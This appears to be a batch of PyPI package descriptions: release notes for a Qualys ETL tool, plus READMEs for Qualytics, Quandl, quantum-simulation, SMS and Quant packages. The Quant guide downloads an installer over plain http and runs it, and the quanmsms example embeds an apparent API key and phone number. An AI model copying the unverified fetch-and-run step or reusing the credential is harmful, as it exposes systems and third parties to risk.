exporting to distribution batch file for downstream processing..\n0.8.00 | 2022-12-05 05:00 ET | Updates: 5) BATCH_DATE, BATCH_NUMBER added to Q_Asset_Inventory for tracability back to original batch json data used for loading table\n0.8.00 | 2022-12-05 05:00 ET | Updates: 6) BATCH_NUMBER should always be stored as a text field.\n0.8.00 | 2022-12-05 05:00 ET | Updates: 7) Removed Q_Host_List_Detection view. Table Views can be injected into database post process to meet customer requirements.\n0.8.01 | 2022-12-06 05:00 ET | Minor Documentation Updates.\n0.8.02 | 2022-12-06 05:00 ET | Minor Documentation Updates.\n0.8.05 | 2022-12-06 05:00 ET | Updated to allow for csv quoting and dialect customization. 
The following are defaults that can be adjusted in etld_config_settings.yaml.\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_quoting = 'csv.QUOTE_NONE'\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_delimiter = '\\t'\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_doublequote = False\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_escapechar = '\\'\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_lineterminator = '\\n'\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_quotechar = None\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_skipinitialspace = False\n0.8.05 | 2022-12-09 05:00 ET | csv_distribution_python_csv_dialect_strict = False\n0.8.05 | 2022-12-09 05:00 ET | The csv_distribution_python options above are tested with mysql load options in bash shell:\n0.8.05 | 2022-12-09 05:00 ET | zcat [table file].csv.gz | mysql $PORT_OPT -v -e \"LOAD DATA LOCAL INFILE '/dev/stdin' INTO TABLE ${TABLE_NAME} CHARACTER SET UTF8 FIELDS TERMINATED BY '\\\\t' ESCAPED BY '\\\\\\\\' LINES TERMINATED BY '\\\\n';\"\n0.8.05 | 2022-12-09 05:00 ET | SEE Log for options that are selected for your csv_distribution run to validate the options meet your needs.\n0.8.10 | 2022-12-16 09:00 ET | Internal enhancements to authentication, replacing etld_lib_credentials with etld_lib_authentication_objects.\n0.8.10 | 2022-12-16 09:00 ET | Added etld_config_settings.yaml option was_catalog_start_greater_than_last_id=[ID NUM], resulting in pulling only catalog entries greater_than_last_id entered.\n0.8.10 | 2022-12-16 09:00 ET | Added transform to asset inventory table, from sensor json, new table fields: \"sensor_lastPcScanDateAgent\", \"sensor_lastPcScanDateScanner\", \"sensor_lastVmScanDateAgent\", \"sensor_lastVmScanDateScanner\" added to SQLite Schema.\n0.8.11 | 2022-12-20 14:00 ET | Updated first time setup of user to allow for updating user/password from template.\n0.8.14 | 2023-01-23 09:00 ET | Updated WAS to iterate / include over 1000 findings in a web application.\n0.8.20 | 2023-08-08 23:00 ET | Added experimental support for Host List Detection ASSET_CVE field. Contact your Technical Account Manager and David Gregory to enable ASSET_CVE. See [QWEB 10.23 release notification for details](https://www.qualys.com/docs/release-notes/qualys-cloud-platform-10.23-api-release-notes.pdf) \n0.8.20 | 2023-08-08 23:00 ET | Added Database Injection - Methods to inject schema/data from QualysETL into your downstream databases. Ex. Azure Cosmos DB (PostgreSQL), Amazon RedShift, PostgreSQL Open Source, MySql Open Source, SnowFlake, Microsoft SQL Server. Contact your Qualys TAM to schedule a call with David Gregory if you wish to use this feature. \n0.8.20 | 2023-08-08 23:00 ET | Visualization Use Case - Use QualysETL to build your downstream databases for use with PowerBI, Tableau, Etc. Contact your Qualys TAM to schedule a call with David Gregory if you wish to use this feature. \n0.8.20 | 2023-08-08 23:00 ET | QWEB 10.23 Updates - Delivered additional fields for Host List and Host List Detection. For details see: See [QWEB 10.23 release notification for details](https://www.qualys.com/docs/release-notes/qualys-cloud-platform-10.23-api-release-notes.pdf) \n0.8.20 | 2023-08-08 23:00 ET | Web Application Scanning(WAS) - Updated timing in WAS for long running jobs.\n0.8.20 | 2023-08-08 23:00 ET | Docker Image Testing - Contact your TAM to schedule a call with David Gregory. 
Encapsulate Python Application into distributable docker image for ease os operation and upgrade.\n0.8.21 | 2023-08-09 11:00 ET | Minor updates to images depicting host list detection schema and web application scanning schema.\n0.8.30 | 2023-10-06 11:00 ET | Added Policy Compliance PCRS -e etl_pcrs to QualysETL.\n0.8.30 | 2023-10-06 11:00 ET | Added fields to CSAM -e etl_asset_inventory: easmTags, hostingCategory1, customAttributes, organizationName\n0.8.40 | 2023-10-07 18:00 ET | PCRS - Added Performance Improvements Added to reduce memory usage and improve multiprocessing.\n0.8.50 | 2023-10-09 18:00 ET | PCRS - Optional Normalized Schema added for PCRS PostureInfo Table, ~50% reduction in space required for PostureInfo.\n0.8.52 | 2023-10-22 18:00 ET | Updated Platform Identification, Added type to Q_WAS_FINDING table in -e etl_was, Default to Normalization for PCRS, and minor doco updates. \n0.8.76 | 2023-11-30 10:00 ET | Minor update to ensure systems have swap space before executing qualysetl. Updated csv distribution format. \n0.8.80 | 2024-01-26 15:00 ET | Minor updates to documentation, addressed edgecase to fix non-utf8 data.\n0.8.85 | 2024-01-29 10:00 ET | Added option to exclude trurisk for edge case where VMDR is not enabled in customer subscription. Ex. Consulting EditionRelease Notes Log0.8.76 Updates to distribution_dir and edge case no swap spaceEdge case: Abort if swap size is zero and ask user to add swap space (recommend 4GB - 8GB swap).Improved edge case exception processing for out of memory on small memory systems.Default csv distribution update:default output format improved for database loader processing:New: {'quoting': csv.QUOTE_ALL, 'delimiter': ',', 'doublequote': True, 'escapechar': None, 'lineterminator': '\\r\\n', 'quotechar': '\"', 'skipinitialspace': False, 'strict': False}Example:psql -c \"\\COPY ${SCHEMA_NAME}.${TABLE_NAME} FROM STDIN WITH (FORMAT csv, DELIMITER ',', QUOTE '\\\"', ENCODING 'UTF8')\"Old:{'quoting': csv.QUOTE_NONE, 'delimiter': '\\t', 'doublequote': False, 'escapechar': '\\\\', 'lineterminator': '\\n', 'quotechar': None, 'skipinitialspace': False, 'strict': False}Note that csv distribution output should only be used if downstream application is developed to handle new fields over time.To Maintain a data contract, use the explicit ordered field names in a sqlite3 select statement to maintain data contract with downstream systems.Created Release Notes Log section at tail end of this document to hold historical release notes.0.8.52 includes the following updates. See Changelog for additional details.Updated PCRS - Default to Normalized Schema Option. Use etld_config_settings.yaml if you do not want to normalize the schema.Updated Platform Identification to recognize additional PODsMinor documentation updates.Updated -e etl_was to include type in q_was_finding table.0.8.50 includes the following updates. 
See Changelog for additional details.0.8.50:Optional Normalized Schema for PCRS PostureInfo Table, ~50% reduction in space required for PostureInfo.To normalize PCRS PostureInfo add the following option to your etld_config_settings.yaml file.pcrs_postureinfo_schema_normalization_flag: TrueThe schema will change to an optimized schema reducing space required by ~50%.A new table will be created where policyid, controlid, technology id are key to obtaining details of control.Q_PCRS_PostureInfo table has the following fields removed and placed in new table Q_PCRS_PostureInfo_Controls for normalization.policyTitle,controlStatement,rationale,remediation,controlReference,technology,criticalitySee PCRS Schemas below in documenation for more details.Performance Improvements to reduce memory and speed up multiprocessing to download data faster.Added Policy Compliance PCRS to QualysETL including the Policy List, Host Ids associated with each Policy and Posture Info.The 0.8.x >= 0.8.30 series supports Policy Compliance (PCRS), Vulnerability Management (VMDR), GAV/CSAM V2 and Web Application Scanning (WAS) Data.Added easmTags, hostingCategory1, customAttributes, organizationName to etl_asset_inventory (CSAM)https://notifications.qualys.com/api/2023/03/20/qualys-cloud-platform-2-15-csam-api-notification-10.8.21 includes the following updates. See Changelog for additional details.Added QualysETL Automation for injecting schema/data into downstream databases for metrics, analysis and visualization in PowerBI, Tableau, etc. Databases Tested include Azure CosmosDB (PostgreSQL), PostgreSQL Open Source, Amazon Redshift, Snowflake, Mysql, Microsoft SQL Server.Added Docker Beta to run QualysETL in a containerAdded QWEB 10.23 Updates - SeeQWEB 10.23 release notification for detailsTested on Ubuntu 22.04 and Red Hat 9.x as they are the latest supported platforms.The 0.8.x series supports VM, CSAM and WAS Data.Next on the roadmap is Policy Compliance (PCRS) for Nov, 2023.Please see the accompanying videos for additional guidancePart 3 - Host List Detection.Qualys API Best Practices SeriesPart 4 - CyberSecurity Asset Management.Qualys API Best Practices SeriesThe latest schema snapshots are in this document for reference. To obtain the latest schema from QualysETL, please use the SQLite Database output from QualysETL.SeePython Package Index for Qualys ETLfor latest version of qualysetl.SeeRoadmapfor additional details on what's coming next.SeeQuick Startto get started now."} +{"package": "qualytics-cli", "pacakge-description": "Qualytics CLIThis is a CLI tool for working with Qualytics API. With this tool, you can manage your configurations, export checks, import checks, and more. It's built on top of the Typer CLI framework and uses the rich library for fancy terminal prints.RequirementsPython 3.7+Packages:typerosjsonrequestsurllib3rerichInstallationpipinstallqualytics-cliUsageHelpqualytics--helpInitializing the ConfigurationYou can set up your Qualytics URL and token using theinitcommand:qualyticsinit--url\"https://your-qualytics.qualytics.io/\"--token\"YOUR_TOKEN_HERE\"OptionTypeDescriptionDefaultRequired--urlTEXTThe URL to be set. 
Example:https://your-qualytics.qualytics.io/NoneYes--tokenTEXTThe token to be set.NoneYesQualytics init helpqualyticsinit--helpDisplay ConfigurationTo view the currently saved configuration:qualyticsshow-configExport ChecksYou can export checks to a file using thechecks exportcommand:qualyticschecksexport--datastoreDATASTORE_ID[--containersCONTAINER_IDS][--tagsTAG_NAMES][--outputLOCATION_TO_BE_EXPORTED]By default, it saves the exported checks to./qualytics/data_checks.json. However, you can specify a different output path with the--outputoption.OptionTypeDescriptionDefaultRequired--datastoreINTEGERDatastore IDNoneYes--containersList of INTEGERContainers IDsNoneNo--tagsList of TEXTTag namesNoneNo--outputTEXTOutput file path./qualytics/data_checks.jsonNoExport Check TemplatesEnables exporting check templates to the_export_check_templatestable to an enrichment datastore.qualyticschecksexport-templates--enrichment_datastore_idENRICHMENT_DATASTORE_ID[--check_templatesCHECK_TEMPLATE_IDS]OptionTypeDescriptionDefaultRequired--enrichment_datastore_idINTEGERThe ID of the enrichment datastore where check templates will be exported.Yes--check_templatesTEXTComma-separated list of check template IDs or array-like format. Example: \"1, 2, 3\" or \"[1,2,3]\".NoImport ChecksTo import checks from a file:qualyticschecksimport--datastoreDATASTORE_ID_LIST[--inputLOCATION_FROM_THE_EXPORT]By default, it reads the checks from./qualytics/data_checks.json. You can specify a different input file with the--inputoption.Note: Any errors encountered during the importing of checks will be logged in./qualytics/errors.log.OptionTypeDescriptionDefaultRequired--datastoreTEXTComma-separated list of Datastore IDs or array-like format. Example: 1,2,3,4,5 or \"[1,2,3,4,5]\"NoneYes--inputTEXTInput file pathHOME/.qualytics/data_checks.jsonNoneSchedule Metadata Export:Allows you to schedule exports of metadata from your datastores using a specified crontab expression.qualyticsschedule_appexport-metadata--crontab\"CRONTAB_EXPRESSION\"--datastore\"DATASTORE_ID\"[--containers\"CONTAINER_IDS\"]--options\"EXPORT_OPTIONS\"OptionTypeDescriptionRequired--crontabTEXTCrontab expression inside quotes, specifying when the task should run. Example: \"0 * * * *\"Yes--datastoreTEXTThe datastore IDYes--containersTEXTComma-separated list of container IDs or array-like format. Example: \"1, 2, 3\" or \"[1,2,3]\"No--optionsTEXTComma-separated list of options to export or \"all\". Example: \"anomalies, checks, field-profiles\"Yes"} +{"package": "quamotion", "pacakge-description": "UNKNOWN"} +{"package": "quanario", "pacakge-description": "Quanario_VK - Module for the development of chatbots in the social network VKontakte"} +{"package": "quanbit", "pacakge-description": "QuanbitAboutQuanbitis a pythonic package for simulating quantum computer. 
It faciliate basic quantum algorithm exploration on a classic computer.PlatformQuanbitis a pure python package supportingWindows,LinuxandMacOS.Example:Quantum TeleportationfromquanbitimportX,Y,Z,BellBasisfromquanbitimportcubit,bell_state,Measureimportnumpyasnp# Alice has an unknown qubit Ctheta,phi,alpha=np.random.rand(3)qubit_C=cubit(theta,phi,alpha)# To teleport the cubit, Alice and Bob need to share a maximally entangled state# Anyone of the four states is sufficient, we choose 1/sqrt(2) (|00> + |11>) herequbit_AB=bell_state(0)# Now the total state is, where @ represent tensor product:total_state=qubit_C@qubit_AB# Project the state of Alice's two qubits as a superpositions of the Bell basistotal_state=BellBasis(total_state,[0,1])# Measuring her two cubits in Bell basisCA,B_state=Measure(total_state,indices[0,1])# Rotate Bob's state based on the measurement result# if CA == (0, 0), no change need to be made# when CA is in state \\Psi+ifCA==(0,1):B_state=X(B_state)# when CA is in state \\Psi-elifCA==(1,0):B_state=Z(X(B_state))# when CA is in state \\Phi-elifCA==(1,1):B_state=Z(B_state)# Now Bob's state is the same as Alice initial qubit_C.LicenseQuanbitis distributed underBSD 3-Clause.DependenceInstallation requirements:numpyTesting requirement:pytestQA requirement:toxInstallationTo run tests:pytestquanbitTo install Quanbit to system:pipinstall.Local build and TestingTo install editable Quanbit locally:pipinstall-e.To run tests:pytesttestsQuality AssuranceTo run QA locally:tox"} +{"package": "quan-chem-kit", "pacakge-description": "Quantum Chemistry Kit"} +{"package": "quandelibc", "pacakge-description": "Collection of c-optimized computation primitive available as python module. When possible, the low level function uses INTEL SIMD primitives."} +{"package": "quandl-fund-xlsx", "pacakge-description": "quandl_fund_xlsxA unofficial CLI tool which uses the Quandl API and the Sharadar Essential Fundamentals\nDatabase to extract financial fundamentals, Sharadar provided ratios as\nwell as calculate additional ratios. Results are\nwritten to an Excel Workbook with a separate worksheet per ticker analysed.Free software: Apache Software License 2.0Documentation:https://quandl_fund_xlsx.readthedocs.io.FeaturesFor a given ticker, fundamental data is obtained using the Quandl API and the\nSharadar Fundamentals database. This data is then used to calculate various\nuseful, financial ratios. The ratios includeProfitability indicatorsFinancial leverage indicatorsFree and Operating Cash flow indicators.Some REIT specific ratios such as FFO are very roughly approximated.\nThese specific ratios are only roughly approximated since certain data, namely\nReal estate sales data for the period does not appear to be available via the\nAPI (It\u2019s often buried in the footnotes of these companies filings).The output excel worksheet for each ticker processed is divided into three main areas:Sharadar statement indicators. This is data obtained from the three main\nfinancial statements; the Income Statement, the Balance Sheet and the Cash Flow\nStatement.Sharadar Metrics and Ratio Indicators. These are quandl provided financial ratios.Calculated Metrics and Ratios. These are calculated by the package from the\nSharadars data provided and tabulated by the statement indicators and the\n\u2018Metrics and Ratio\u2019 indicators.The python Quandl API provides the ability to return data within python pandas\ndataframes. 
This makes calculating various ratios as simple as dividing two\nvariables by each other.The calculations support the data offered by the free sample\ndatabase (formerly referred to by Sharadar as the SF0 database), and the paid forSF1database. The coverage universe is the same for both the sample data and the\npaid database. The key difference being, support as well as a much richer set\nof so-called Dimensions (timeperiods). For example the sample data is taken from the annual\nfilings of companies, whereas the paid data allows for Trailing Twelve Month\nas well as quarterly data.Note: For quarterly data, many of the ratios using income and cash flow statement values in the\nnumerator will be inaccurate when using quarterly data e.g EBITDA/Intereset\nexpense or Total Debt/ Cash Flow from Operations.The generated Excel workbook with one sheet per ticker.Some bespoke metrics and ratios calculated based on Sharadar fundamentals.Installationpipinstallquandl_fund_xlsxConfigurationYou will need a Quandl API key. This maybe obtained by signing up, for free atQuandl Signup.\nThe key will then be available under \u201cprofile\u201d when logging into Quandl. This\nkey allows for access to sample data for many of the datasets.If you have have a key for the free sample data set the QUANDL_API_SF0_KEY\nenvironment variable to the value of your key.If you have paid for access to the Sharadar\nfundamentals data set, then set the QUANDL_API_SF1_KEY in the environment.exportQUANDL_API_SF0_KEY='YourQuandlAPIKey'orexportQUANDL_API_SF1_KEY='YourQuandlAPIKey'For windows the setx command is used to set environment variables..Usage of the quandl_fund_xlsx CLI commandquandl_fund_xlsx-hquandl_fund_xlsxUsage:quandl_fund_xlsx(-i|-t)[-o][-y][-d][--dimension]quandl_fund_xlsx.py(-h|--help)quandl_fund_xlsx.py--versionOptions:-h--helpShowthisscreen.-i--inputFilecontainingonetickerperline-t--tickerTickersymbol-o--outputOutputfile[default:stocks.xlsx]-y--yearsHowmanyyearsofresults(max7withSF0)[default:5]-d--databaseSharadarFundamentalsdatabasetouse,SFOorSF1[default:SF0]--dimensionSharadardatabasedimension,ARY,MRY,ART,MRT[default:MRY]--versionShowversion.quandl_fund_xlsx-tINTC-ointc-MRY.xlsx{'--database':'SF0','--input':None,'--output':'INTC-MRY.xlsx','--ticker':'INTC','--years':'5'}('Ticker =','INTC')2017-08-2206:08:59,751INFOProcessingthestockINTC2017-08-2206:09:06,012INFOProcessedthestockINTCls-lhexcel_filestotal12K-rw-rw-r--1testtest8.7KAug2206:09intc-MRY.xlsxLocal DevelopmentThis section is only of relevance if you wish to hack on the code yourself,\nperhaps to add new ratios or display other Sharadar provided data values.It\u2019s recommended to setup a virtual environment and perform the installation\nwithin this. 
Use pip to install the requirements but not the\npackage.pipinstall-rrequirements_dev.txt# Run the CLI by running as a modulepython-mquandl_fund_xlsx.cli-tMSFT# Run the testspytestIf you wish to install the package locally within either a virtualenv or\nglobally this can be done once again using pip.pipinstall-e.# Now the CLI is installed within our environment and should be on the\n# pathquandl_fund_xlsx-tMSFTHow to get help contribute or provide feedbackSee thecontribution submission and feedback guidelines CreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.1.1 (2017-08-31)First release on PyPI.0.1.2 (2017-08-31)Change logging to INFO from DEBUG0.1.3 (2017-08-31)Minor tweak to Return the correct version0.1.4 (2017-11-06)Removed the \u2013dimension CLI keyword.\nNow uses Most Recent Year (MRY) for SF0 database\nand Most Recent Trailing 12 Months (MRT) for the SF1 databaseFix to avoid the Pandas future warning about decrementing\ndf.rename_axis and using df.rename0.1.6 (2018-01-26)Now uses the get_table methods from the quandl_api.0.1.7 (2018-05-10)Fix bug where the dataframe returned from quandl qas not being sortedAdded EPS and EPS diluted.0.1.8 ( 2018-05-24)Fix bug where the SF0 subscription data was not being returned.With the discontinuation of the Sharadar Time series API at the end of March\n2018, the codes for the free fundamental subscription SF0 database changed.\nSubscribers to the SF0 data now use the SHARADAR/SF1 code in the get_table\naccesses.0.1.9 ( 2018-06-11)Added back support for the \u2013dimension CLI option.0.1.10 (2018-10-29)Added some new Cash Flow related ratios and corrected the LTDEBT ratiosChanged the default to be the paid SF1 Database as this is the one I\u2019m using\nand testing. Requires a separate free SF0 subscription to test SFO. All of\nthe API calls whether the user has an SFI paid membership or SF0 use the\nSF1 codes.0.2.0 (2018-11-13)After learning that the sample data API now allows _all_ of the same\nindicators as those available using the paid SF! aPI key I was able to\nremove a lot of special case code for the Sample data KEY.\nThe paid KEY allows for many more dimensions to be queried.The CLI now defaults back to using the sample data SF0 API key.Added a number of Cash Flow from Operations based metrics as well as some\nFree Cash Flow based metrics.Added a development test which uses the API and a sample data or SF0 API key\nto extract ratios for AAPL.Added Excess Cash Margin ratio.0.2.1 (2018-11-13)Minor security fix, requests version now >=2.20.0Minor documentation cleanup0.2.2 (2018-11-13)Add support for the MRQ and ARQ dimensions.Correct error in calculating CAGR when the data was given in quarterly increments.Correctly reference the Excel spreadsheet example figures in the README.0.2.3 (2018-12-29)Check for the presence of the QUANDL_API_SF0_KEY or the QUANDL_API_SF1_KEY\nenvironment variable depending on which database the user is requesting to use.0.3.0 (2019-09-12)Refactored by using and manipulating the pandas dataframe as it\u2019a returned from\nquandl/Sharadar. The dates are rows and the columns are the \u201cobservations\u201d\nie the revenue, income etc. 
The dataframe is transposed prior to writing to\nexcel so that the data is in the typically viewed format of dates as columns\nand the observations as rows.0.3.1 (2019-11-11)Added some metrics favored by Kenneth J Marshall, author of\n\u201cGood Stocks Cheap: Value investing with confidence for a lifetime of\nStock Market Outperformance\u201d0.3.2 (2020-03-31)Added the working capital value from the balance sheet\nNote: For finance companies and REITS this is not provided by the API.0.4.0 (2020-04-21)Added a summary sheet as the first sheet of a workbook.\nThis is conditionally formatted to highlight the best and worst\nvalues for each of the summarized metrics of each ticker in the\nworkbook.\nThe summary table is an excel table and thus each column can be sorted\nto put best on top or worst on top.0.4.1 (2021-02-03)Added roic and roce to the summary sheet."} +{"package": "quandlpy", "pacakge-description": "UNKNOWN"} +{"package": "quanestimation", "pacakge-description": "QuanEstimationDocumentationQuanEstimation is a Python-Julia based open-source toolkit for quantum parameter estimation, which consist in the calculation of the quantum metrological tools and quantum resources, and the optimizations with respect to the probe states, the controls or the measurements, as well as comprehensive optimizations in quantum metrology. Futhermore, QuanEstimation can generate not only optimal quantum parameter estimation schemes, but also adaptive measurement schemes.DocumentationThe documentation of QuanEstimation can be foundhere.InstallationRun the command in the terminal to install QuanEstimation:pip install quanestimationCitationIf you use QuanEstimation in your research, please cite the following paper:[1] M. Zhang, H.-M. Yu, H. Yuan, X. Wang, R. Demkowicz-Dobrza\u8245ski, and J. Liu,\nQuanEstimation: An open-source toolkit for quantum parameter estimation,arXiv:2205.15588.=======\nHistory0.1.0 (2022-06-04)\n0.1.3 (2022-06-08)\n0.1.4 (2022-06-19)\n0.1.5 (2022-07-07)\n0.2.0 (2022-09-01)First release on PyPI."} +{"package": "quanfima", "pacakge-description": "Quanfima(quantitativeanalysis offibrousmaterials)\nis a collection of useful functions for morphological analysis and visualization\nof 2D/3D data from various areas of material science. 
The aim is to simplify\nthe analysis process by providing functionality for frequently required tasks\nin the same place.More examples of usage you can find in the documentation.Analysis of fibrous structures by tensor-based method in 2D / 3D datasets.Estimation of structure diameters in 2D / 3D by a ray-casting method.Counting of particles in 2D / 3D datasets and providing a detailed report in\npandas.DataFrame format.Calculation of porosity measure for each material in 2D / 3D datasets.Visualization in 2D / 3D using matplotlib, visvis packages.InstallationThe easiest way to install the latest version is by using pip:$ pip install quanfimaYou may also use Git to clone the repository and install it manually:$ git clone https://github.com/rshkarin/quanfima.git\n$ cd quanfima\n$ python setup.py installUsageOpen a grayscale image, perform segmentation, estimate porosity, analyze fiber\norientation and diameters, and plot the results.importnumpyasnpfromskimageimportio,filtersfromquanfimaimportmorphologyasmrphfromquanfimaimportvisualizationasvisfromquanfimaimportutilsimg=io.imread('../data/polymer_slice.tif')th_val=filters.threshold_otsu(img)img_seg=(img>th_val).astype(np.uint8)# estimate porositypr=mrph.calc_porosity(img_seg)fork,vinpr.items():print'Porosity ({}):{}'.format(k,v)# prepare data and analyze fibersdata,skeleton,skeleton_thick=utils.prepare_data(img_seg)cskel,fskel,omap,dmap,ovals,dvals=\\mrph.estimate_fiber_properties(data,skeleton)# plot resultsvis.plot_orientation_map(omap,fskel,min_label=u'0\u00b0',max_label=u'180\u00b0',figsize=(10,10),name='2d_polymer',output_dir='/path/to/output/dir')vis.plot_diameter_map(dmap,cskel,figsize=(10,10),cmap='gist_rainbow',name='2d_polymer',output_dir='/path/to/output/dir')>>Porosity(Material1):0.845488888889"} +{"package": "quangdvn-pdf", "pacakge-description": "## THIS IS THE PACKAGE"} +{"package": "quangdv-pybloqs", "pacakge-description": "Data Visualization and Report Building fork from PyBlogs"} +{"package": "quanmodule", "pacakge-description": "It\u2019s my first Python package bitch"} +{"package": "quanmsms", "pacakge-description": "quanmsms_Python[\u4e2d\u6587] |English\u4ecb\u7ecdpython\u7248\u672c\u8981\u6c42:py3.x\n\u5b89\u88c5\uff1apip install quanmsms\n\u6700\u8fd1\u66f4\u65b0:2023/12/24\u4f7f\u7528# \u6211\u4eec\u5728sdk\u4e2d\u63d0\u4f9b\u4e86example.py(\u6700\u5c0f\u793a\u4f8b\u6587\u4ef6)# \u4f46\u60a8\u4ecd\u53ef\u53c2\u8003\u672c\u6587\u6863# \u8bf7\u786e\u8ba4\u5728\u5f53\u524d\u73af\u5883\u5b89\u88c5\u4e86\u6700\u65b0\u7248sdk\uff1apip install quanmsmsfromquanmsmsimportsdk# openID\u3001Apikey\u4ee5\u53ca\u6a21\u677f\u90fd\u53ef\u4ee5\u5728 https://dev.quanmwl.com/ability_sms \u67e5\u770b\u5230# \u5176\u4e2d\uff0c\u6a21\u677f\u53ef\u4ee5\u5728\u6d4b\u8bd5\u63a5\u53e3\u6210\u529f\u540e\u7533\u8bf7\u81ea\u5b9a\u4e49\u6a21\u677fsms=sdk.SDK('2',# OpenID'wd4wa8d4a98w94d89wefwsef4ae9f7ad59ae46s7te49g7t4g9y65h'# Apikey)# \u624b\u673a\u53f7 \u6a21\u677fid \u6a21\u677f\u53c2\u6570sendOK,info,apiStatus=sms.send('19954761564',0,{'code':12344})print(sendOK)# \u662f\u5426\u6210\u529f(\u5e03\u5c14\u503c)print(apiStatus)# api\u72b6\u6001\u7801print(info)# \u63cf\u8ff0\u4fe1\u606f"} +{"package": "quanp", "pacakge-description": "Quanp \u2013 Quantitative Analysis in PythonQuanp is a scalable toolkit for analyzing cross-sectional and longitudinal/time-series\nquantitative data. It was first inspired byscanpyand\njointly built withanndata. It includes\npreprocessing, visualization, clustering, features selection/importance.Read thedocumentation. 
If you\u2019d like to contribute by opening an issue or creating a pull request,\nplease take a look at ourcontributing guide.\nIf Quanp is useful for your research, consider being a contributor."} +{"package": "quanpy", "pacakge-description": "UNKNOWN"} +{"package": "quant", "pacakge-description": "Welcome to QuantQuant is an enterprise software application for quantitative analysis.\nQuant combinesSciPyandDomainModel.Quant contains a domain model which has exchanges, symbols, markets,\nprice histories, price processes, images, books, contracts of different\ntypes, pricers, pricing preferences, and reports.Quant has a domain-specific language (Quant DSL) for expressing and\nevaluating contracts in a generic manner.Quant has a Web user interface, and an API for machine clients. Quant has a\nflexible role-based access controller. There is a Web admin interface, and\nalso command line programs to support site setup and administration.Quant can be extended by adding new price processes, custom contract types,\nand alternative pricers. Quant is currently distributed with a Black Scholes\nprice process. There are contract types for American, Binary, European,\nFutures, and for expressing contracts with Quant DSL. There are pricers\nimplementing the Monte Carlo, binomial tree, and Black Scholes methods. There\nis a pricer for contract types based on the Quant DSL which involves the\nLongstaff Schwartz least-squares Monte Carlo (LSM) method.Other features we are planning to implement include:Market prices pulled from exchange APIs;Integration with common spreadsheet applications;State machine enhancements to DSL;Different price processes (e.g local volatility).If you would like to suggest a feature, please get in touch!WebsitePlease visit theQuant project website.Install GuideWelcome to the Quant Install Guide.It is very easy to create new Quant services. Either do it all manually or\nuse the Quant installer. Afterwards, simply configure and restart Apache.The Quant installer will deploy Quant into a new virtual Python environment.\nNew services are set up with an SQLite database. Installer options exist\nfor using other database management systems, and it is possible to migrate\nbetween different database management system after the service is created.Operating System DependenciesBefore installation, make sure required system packages are installed:$ sudo aptitude install python python-numpy python-scipy sqlite3If you are using Python 2.5, you will also need a few other packages:$ sudo aptitude install build-essential python-dev libsqlite3-devCheck your Python can load scipy with (returns silently if available):$ python -c \"import numpy\"\n$ python -c \"import scipy\"Please note, if you will install Quant into an isolated virtual Python\nenvironment (e.g. 
with virtualenv), you will want to create library links\nto the Python packages for SciPy (and NumPy) before installing Quant.Manual Code InstallInstall the Quant Python package (and dependencies) either by running:$ pip install quantOr by downloading the Quant tarball, unpacking and running:$ python setup.py installAfter installation, please read the following help pages for more information:$ quant-makeconfig --help\n$ quant-admin help setupManual Site SetupDecide a filesystem path for the new site:$ mkdir PATHCreate the new site configuration file:$ quant-makeconfig --master-dir=PATH PATH/quant.confSet up the new site with the new configuration:$ quant-admin setup --config=PATH/quant.confPlease note, if you installed Quant into an isolated virtual Python\nenvironment, you will want to use the \u2013virtualenv-bin-dir option of\nquant-makeconfig.The configuration file defines the filesystem path to the newly generated\nApache configuration file. You will need to need to include this file in the\nmain Apache configuration.Automated Install and DeployYou can create a Quant service in one step with the Quant installer.The installer will build a virtual Python environment, and install\nthe Quant software. The installer will then set up a new site with an SQLite\ndatabase, and it will create an Apache config file to be included in the main\nApache configuration (see below).Download the Quant installer (and make it executable):$ curl -O http://appropriatesoftware.net/provide/docs/quant-virtualenv\n$ chmod +x quant-virtualenvRun the Quant installer. Note that the PATH folder should never be\nunder DocumentRoot of the Apache installation or any other directory\nexposed via Apache web server:$ ./quant-virtualenv PATHPlease note, the path argument is required (and can be relative or absolute).After the installer has completed, continue by configuring Apache with a new\nVirtualHost, check file ownership and permissions, and restart.The installer will diplay the filesystem path to the newly generated Apache\nconfiguration file. You will need to need to include this file in the main\nApache configuration.Apache Configuration StepsMake sure the required system packages are installed:$ sudo aptitude install apache2 libapache2-mod-wsgiAlso, make sure Apache mod_wsgi is enabled:$ sudo a2enmod wsgiPick a domain name for your site. Create a new virtual host which includes\nthe Quant Apache configuration (path mentioned by the installer).Print the path to the Quant Apache configuration file with:$ quant-admin www path --config PATH/etc/quant.confA new Apache virtual host could simply look like this:\n ServerName YOUR-QUANT-SITE\n Include PATH/var/httpd-autogenerated.conf\n WSGIDaemonProcess quant threads=25 maximum-requests=1000\nPlease note, the path to the auto-generated file must be an absolute path (not\na relative path).If necessary, configure your DNS for YOUR-QUANT-SITE.File OwnershipChange ownership of Quant files to Apache (or to the user which the WSGI\ndaemon process runs as):$ chown -R {www-user}:{www-user} PATHRestart ApacheOnce everything is configured, try to restart Apache:$ sudo /etc/init.d/apache2 restartYour virtual host will show a page saying \u2018Welcome to Quant\u2019.Login with username \u2018admin\u2019 and password \u2018pass\u2019.ContactIf you have any difficulties or questions about Quant, please email:quant-support@appropriatesoftware.netPlease note, at the moment, Quant is developed and tested on Ubuntu 10.10\n(64 bit) with Python 2.7. 
